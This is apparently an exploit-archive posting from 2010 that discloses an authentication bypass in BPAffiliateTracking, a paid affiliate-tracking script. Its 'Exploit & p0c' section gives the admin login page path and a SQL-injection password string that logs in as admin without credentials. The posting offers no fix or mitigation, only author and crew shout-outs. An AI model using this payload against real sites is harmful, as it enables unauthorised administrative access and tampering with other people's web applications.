BPAffiliateTracking Authentication Bypass Vulnerability

2010-11-16
ID: 65192
CVE: None
Download vulnerable application: None
-----------------------------------------------------------------------
       
-----------------------------------------------------------------------
Author  : v3n0m
Site    : http://yogyacarderlink.web.id/
Date: November, 16-2010
Location: Jakarta, Indonesia
Time Zone: GMT +7:00

Application: BPAffiliateTracking - Affiliate Tracking Script
Price: $24.40
Vendor  : http://www.bpowerhouse.info/

Exploit & p0c
_____________

go to
http://127.0.0.1/[path]/adminlogin.asp

then login with
Username : admin
Password : 1'or'1'='1

ShoutZ
______

All YOGYACARDERLINK CREW, GheMaX, LeQhi
Also Jovita & Fabian :)
1-4-2 (www02)